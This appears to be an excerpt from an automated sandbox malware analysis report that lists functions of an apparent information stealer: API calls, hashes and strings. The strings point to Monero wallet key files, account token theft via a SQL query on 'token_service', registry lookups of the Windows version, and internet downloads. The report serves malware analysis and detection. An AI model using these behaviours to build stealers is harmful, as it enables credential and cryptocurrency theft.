                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$EnumFreeOpenProcessValuememsettask
                      • String ID: Password
                      • API String ID: 2808661185-3434357891
                      • Opcode ID: 983efe550947f7bd7b6706bea103f31df3699e89ecde1e6c3ca32747da8ec2cb
                      • Instruction ID: 1d8d2ea39a9085014b83ecbf02f6b577c8face05f7648f10d8425b6f276a5ee8
                      • Opcode Fuzzy Hash: 983efe550947f7bd7b6706bea103f31df3699e89ecde1e6c3ca32747da8ec2cb
                      • Instruction Fuzzy Hash: 6B611EB59142589BDB24DB50CC95FDAB7B8BF64300F0081E9E689A6181DFB09FC9CF91
                      Function 001D8100 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 67memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E3E4A8,00000000,?,001E0E2C,00000000,?,00000000), ref: 001D8130
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D8137
                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 001D8158
                      • wsprintfA.USER32 ref: 001D81AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                      • String ID: %d MB$@$h
                      • API String ID: 2922868504-3650706056
                      • Opcode ID: 260e3d115d29cb3b08f6e6237d07c5aa3b3480db3889253087d6be010c814b10
                      • Instruction ID: 5a04cefcc117879435696b5368a088aff9f5374cf944092c52156367cf6930c6
                      • Opcode Fuzzy Hash: 260e3d115d29cb3b08f6e6237d07c5aa3b3480db3889253087d6be010c814b10
                      • Instruction Fuzzy Hash: 88214AB1E44318ABDB04DFD4DD49FAEB7B8FB44B00F10461AF605BB280C77869058BA9
                      Function 001D7690 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 43registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D76A4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D76AB
                      • RegOpenKeyExA.ADVAPI32(80000002,00E2C428,00000000,00020119,00000000), ref: 001D76DD
                      • RegQueryValueExA.ADVAPI32(00000000,00E3E430,00000000,00000000,?,000000FF), ref: 001D76FE
                      • RegCloseKey.ADVAPI32(00000000), ref: 001D7708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: 0$Windows 11
                      • API String ID: 3225020163-921549449
                      • Opcode ID: d28db8bf3ece67f8792c40fe3cbc7fad327e60e7b4508b4bc466b2b511e8a0d8
                      • Instruction ID: 800dc35e8be4a57a678a3c17a0700132c38095da6ed6e6e8b8c66492a4a47d54
                      • Opcode Fuzzy Hash: d28db8bf3ece67f8792c40fe3cbc7fad327e60e7b4508b4bc466b2b511e8a0d8
                      • Instruction Fuzzy Hash: A80162B5A04304BBE700EBE4DE4DF6EB7B8EB48701F108465FA04E72D1E77099148B55
                      Function 001CBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                      • lstrlen.KERNEL32(00000000), ref: 001CBC9F
                        • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 001CBCCD
                      • lstrlen.KERNEL32(00000000), ref: 001CBDA5
                      • lstrlen.KERNEL32(00000000), ref: 001CBDB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                      • API String ID: 3073930149-1079375795
                      • Opcode ID: c0889f62681aaf87e5458e4c932d0308e57dd001dc17f928661dd585d6ece3ab
                      • Instruction ID: d909545cdd75544b749e00abdb7bb243a16dea49dbfcec92b9c42b72b5f73d7b
                      • Opcode Fuzzy Hash: c0889f62681aaf87e5458e4c932d0308e57dd001dc17f928661dd585d6ece3ab
                      • Instruction Fuzzy Hash: 18B15571910158ABDF04FBA0CD96EEE7338AF64301F804569F506B3291EF346E49DBA6
                      Function 001D6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess$DefaultLangUser
                      • String ID: *
                      • API String ID: 1494266314-163128923
                      • Opcode ID: 03dde7e81fec5d96dc8fd7c22c12825b73de995d2d965908f4efaeec7a897302
                      • Instruction ID: f3d1579eb177c81c0adeaff34cb6aaccbe709001630ba7782be5a8375e53862b
                      • Opcode Fuzzy Hash: 03dde7e81fec5d96dc8fd7c22c12825b73de995d2d965908f4efaeec7a897302
                      • Instruction Fuzzy Hash: 57F05E31904309EFD344AFE4EA0976C7B70FB04703F1481A9E609A72D1D6708B61AB9A
                      Function 001C4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 001C4FCA
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001C4FD1
                      • InternetOpenA.WININET(001E0DDF,00000000,00000000,00000000,00000000), ref: 001C4FEA
                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 001C5011
                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 001C5041
                      • InternetCloseHandle.WININET(?), ref: 001C50B9
                      • InternetCloseHandle.WININET(?), ref: 001C50C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                      • String ID:
                      • API String ID: 3066467675-0
                      • Opcode ID: ac73325dc9e3ca7a0a25054b7c2bf81fd574e7e8dbf3036bb26aa0ba2030a156
                      • Instruction ID: 360135bc4005cd6c2652b86ddcde4d087c4f555a6a105060d8bbe2aa1c31b5cf
                      • Opcode Fuzzy Hash: ac73325dc9e3ca7a0a25054b7c2bf81fd574e7e8dbf3036bb26aa0ba2030a156
                      • Instruction Fuzzy Hash: BA3107B4A00218ABDB20CF54DD85BDCB7B4EB48704F5081E9FA09B7281D770AAD58F99
                      Function 001D83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                      Download Yara Rule
                      APIs
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001D8426
                      • wsprintfA.USER32 ref: 001D8459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001D847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 001D848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 001D8499
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                      • RegQueryValueExA.ADVAPI32(00000000,00E3E418,00000000,000F003F,?,00000400), ref: 001D84EC
                      • lstrlen.KERNEL32(?), ref: 001D8501
                      • RegQueryValueExA.ADVAPI32(00000000,00E3E520,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,001E0B34), ref: 001D8599
                      • RegCloseKey.ADVAPI32(00000000), ref: 001D8608
                      • RegCloseKey.ADVAPI32(00000000), ref: 001D861A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                      • String ID: %s\%s
                      • API String ID: 3896182533-4073750446
                      • Opcode ID: f690d10e40afc990f21f0a8380dffa10f0d08c11ec7d2813bcd27caa3d265a1a
                      • Instruction ID: 644812412495ec1b8ee9654cc7ee1b682ac3ca6b5807784dbf730adb53137d5a
                      • Opcode Fuzzy Hash: f690d10e40afc990f21f0a8380dffa10f0d08c11ec7d2813bcd27caa3d265a1a
                      • Instruction Fuzzy Hash: FE21FA7191022CABDB24DB54DD85FE9B3B8FB48714F00C5E9E609A6240DF71AA85CFD4
                      Function 001D7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7734
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D773B
                      • RegOpenKeyExA.ADVAPI32(80000002,00E2C428,00000000,00020119,001D76B9), ref: 001D775B
                      • RegQueryValueExA.ADVAPI32(001D76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 001D777A
                      • RegCloseKey.ADVAPI32(001D76B9), ref: 001D7784
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: CurrentBuildNumber
                      • API String ID: 3225020163-1022791448
                      • Opcode ID: 2c83542f12493a4d15a9de67c708cbc65f4b9558fcc52d5dd26af9dc36043071
                      • Instruction ID: db1956f9125e57dbbefbccf63524a48afe470104e509e3a18180207ad3c7a605
                      • Opcode Fuzzy Hash: 2c83542f12493a4d15a9de67c708cbc65f4b9558fcc52d5dd26af9dc36043071
                      • Instruction Fuzzy Hash: CD0167B5A40308BBD700EBE4DD49FAEB7B8EB48704F008565FA05B7281D77095508B55
                      Function 001D40B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 001D40D5
                      • RegOpenKeyExA.ADVAPI32(80000001,00E3DB60,00000000,00020119,?), ref: 001D40F4
                      • RegQueryValueExA.ADVAPI32(?,00E3DE60,00000000,00000000,00000000,000000FF), ref: 001D4118
                      • RegCloseKey.ADVAPI32(?), ref: 001D4122
                      • lstrcat.KERNEL32(?,00000000), ref: 001D4147
                      • lstrcat.KERNEL32(?,00E3DE00), ref: 001D415B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$CloseOpenQueryValuememset
                      • String ID:
                      • API String ID: 2623679115-0
                      • Opcode ID: d876b71550b92e9a3e21035f74021eb3e9de8e134b2bc3bfd7579abeb3e86f61
                      • Instruction ID: 325f48c3e0056e064c22550a0f46972eff33ec618103a0b55e09fef13b94d8c1
                      • Opcode Fuzzy Hash: d876b71550b92e9a3e21035f74021eb3e9de8e134b2bc3bfd7579abeb3e86f61
                      • Instruction Fuzzy Hash: B241C8B6D002086BDB14FBA0DD46FFE733DAB99300F00855DB61657181EB759B988BD2
                      Function 001C99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                      • LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                      • ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                      • LocalFree.KERNEL32(001C148F), ref: 001C9A90
                      • CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                      • String ID:
                      • API String ID: 2311089104-0
                      • Opcode ID: 49ebdd001904660f343a289e51aec73dfeb067b364ecd035092b68485aaffc1c
                      • Instruction ID: 23ee29a439452deddc37fc8a18274267333eacef90fbeab7e898fec627fc0b71
                      • Opcode Fuzzy Hash: 49ebdd001904660f343a289e51aec73dfeb067b364ecd035092b68485aaffc1c
                      • Instruction Fuzzy Hash: 363127B4A00209EFDB14CFA4C989FAE77B5FF58300F108158E902A7290D778EA51CFA1
                      Function 001DC84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
